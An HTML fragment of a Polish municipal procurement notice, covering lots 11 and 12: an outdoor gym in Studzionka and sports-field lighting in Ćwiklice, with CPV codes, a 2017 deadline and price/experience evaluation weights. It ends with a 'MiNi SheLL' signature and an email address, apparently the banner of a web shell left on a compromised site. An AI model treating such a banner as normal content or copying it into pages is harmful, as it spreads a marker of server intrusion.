                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>11
                  
                <b>Nazwa: </b>11.	Siłownia zewnętrzna przy boisku LKS na działce 2223/20 oraz rozbudowa istniejącej siłowni zewnętrznej na działce 2085/112 w sołectwie Studzionka<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje zaprojektowanie 
       Działka 2223/20 :
 a)  Dostawa i montaż urządzenia do rekreacji-
       urządzenie podwójne siłowni zewnętrznej                            3 kpl.    
       (urządzenie podwójne ma składać się z następujących 
         urządzeń dowolnie dopasowanych: motylek rozpiętki,
        krzesełko do podnoszenia masy ciała  wyciąg górny, 
        krzesełko do podnoszenia masy ciała  wyciskanie,   
        trenażer eliptyczny orbitrek, wioślarz, trenażer nóg i rąk)              
    b) Bezpieczne naturalne podłoże pod poz. a,  b, c. 
     
     Działka 2085/112  
     a) Dostawa i montaż  street workout                                         1 kpl.
     b) Dostawa i montaż  urządzenie podwójne                             1 kpl.
     c)  Nawierzchnia  z mat gumowych dla poz. a, b
     d)  Wykonanie nawierzchni z kostki betonowej ok. 70 m wraz z obrzeżem.      
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>12
                  
                <b>Nazwa: </b>12.	Oświetlenie boiska na działce nr 358/34 w Ćwiklicach<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zakres prac obejmuje zaprojektowanie oświetlenia boiska sportowego poprzez zabudowę czterech masztów oświetleniowych oraz szafy sterującej. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 24/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena </td><td>60</td></tr><tr><td>Doświadczenie projektanta</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com